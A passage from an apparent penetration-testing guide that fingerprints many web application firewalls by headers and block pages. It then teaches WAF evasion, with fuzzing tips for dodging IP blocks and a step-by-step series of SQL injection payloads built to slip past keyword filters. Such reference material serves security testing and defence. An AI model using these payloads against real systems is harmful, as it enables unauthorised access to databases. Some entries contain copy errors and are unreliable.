name="FW_BLOCK"keyword
WallArm
-
Detectability: Moderate - Detection Methodology:
-
Serverheaders containnginx-wallarmvalue.
WatchGuard IPS
-
Detectability: Easy - Detection Methodology:
-
Serverheaders may containWatchGuardfield value. - Blocked response page contains:
-
Request denied by WatchGuard Firewalltext. -
WatchGuard Technologies Inc.as footer.
WebARX Security
-
Detectability: Easy - Detection Methodology:
- Restricted to specifically WordPress sites only.
- Blocked response page contains:
-
This request has been blocked by WebARX Web Application Firewalltext. - Reference to
/wp-content/plugins/webarx/directory where it is installed.
WebKnight
-
Detectability: Easy - Detection Methodology:
- Response headers contain
WebKnightkeyword. - Blocked response page contains:
-
WebKnight Application Firewall Alerttext warning. -
AQTRONIX WebKnighttext snippet. - Blocked response code returned is
999 No Hacking. :p - Blocked response code returned is also
404 Hack Not Found. :p
WebLand
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsApache Protected By WebLand WAFkeyword.
WebRay
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsWebRay-WAFkeyword. - Response headers may have
DrivedByfield with valueRaySrv RayEng/{version}.
WebSEAL
-
Detectability: Easy - Detection Methodology:
-
Serverheader containWebSEALkeyword. - Blocked response page contains:
-
This is a WebSEAL error message template filetext. -
WebSEAL server received an invalid HTTP requesttext snippet.
WebTotem
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
The current request was blocked by WebTotem.
West263CDN
-
Detectability: Easy - Detection Methodology:
- Response headers contain
X-Cacheheader field withWT263CDNvalue.
Wordfence
-
Detectability: Easy - Detection Methodology:
- Response headers contain
WebKnightkeyword. - Blocked response page contains:
-
Generated by Wordfencetext snippet. -
A potentially unsafe operation has been detected in your request to this sitetext warning. -
Your access to this site has been limitedtext warning. -
This response was generated by Wordfencetext snippet.
WTS-WAF
-
Detectability: Easy - Detection Methodology:
- Blocked response page title has
WTS-WAFkeyword. -
Serverheader containswtsas value.
XLabs Security WAF
-
Detectability: Easy - Detection Methodology:
- Response headers contain
X-CDNheader field withXLabs Securityvalue.
Xuanwudun WAF
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/site URL.
Yunaq Chuangyu
-
Detectability: Moderate - Detection Methodology:
- Response page has reference to:
-
365cyd.comor365cyd.netURL. - Reference to help page at
http://help.365cyd.com/cyd-error-help.html?code=403.
-
Yundun
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsYUNDUNas value. -
X-Cacheheader field containsYUNDUNas value. - Response page contains
Blocked by YUNDUN Cloud WAFtext snippet. - Blocked response page contains reference to
yundun.com/yd_http_error/URL.
Yunsuo
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains image class reference to
yunsuologo. - Response headers contain the
yunsuo_sessionfield name.
YxLink
-
Detectability: Easy - Detection Methodology:
- Response might have
yx_ci_sessioncookie field. - Response might have
yx_languagecookie field. -
Serverheader containsYxlink-WAFfield value.
ZenEdge
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
/__zenedge/assets/directory. -
Serverheader containZENEDGEkeyword. - Blocked response headers may contain
X-Zen-Furyheader.
ZScaler
-
Detectability: Easy - Detection Methodology:
-
Serverheader has value set toZScaler. - Blocked response page contains:
-
Access Denied: Accenture Policytext. - Reference to
https://policies.accenture.comURL. - Reference to image at
https://login.zscloud.net/img_logo_new1.png. -
Your organization has selected Zscaler to protect you from internet threats. -
The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate.
-
## Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing:
#### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
- [Other Payloads](https://github.com/foospidy/payloads)
#### Technique:
- Load up your wordlist into fuzzer and start the bruteforce.
- Record/log all responses from the different payloads fuzzed.
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
- Always use proxychains, since chances are real that your IP gets blocked.
#### Drawbacks:
- This method often fails.
- Many a times your IP will be blocked (temporarily/permanently).
### Regex Reversing:
#### Method:
- Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm.
#### Techniques:
### Blacklisting Detection/Bypass
- In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted.
- The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords.
__Case__: SQL Injection
##### • Step 1:
__Keywords Filtered__: `and`, `or`, `union`
__Probable Regex__: `preg_match('/(and|or|union)/i', $id)`
- __Blocked Attempt__: `union select user, password from users`
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
##### • Step 2:
__Keywords Filtered__: `and`, `or`, `union`, `where`
- __Blocked Attempt__: `1 || (select user from users where user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
##### • Step 3:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`
- __Blocked Attempt__: `1 || (select user from users limit 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
##### • Step 4:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`
- __Blocked Attempt__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
##### • Step 5:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
##### • Step 6:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || user_id is not null`
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
##### • Step 7:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
- __Blocked Attempt__: `1 || substr(user,1,1) = unhex(61)`
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
##### • Step 8:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
- __Blocked Attempt__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
- __Bypassed Injection__: `1 || lpad(user,7,1)`
##### • Step 9:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
- __Blocked Attempt__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
### Obfuscation:
#### Method:
- Encoding payload to different encodings (a hit and trial approach).
- You can encode whole payload, or some parts of it and test recursively.
#### Techniques:
__1. Case Toggling__
- Some poorly developed WAFs filter selectively specific case WAFs.
- We can combine up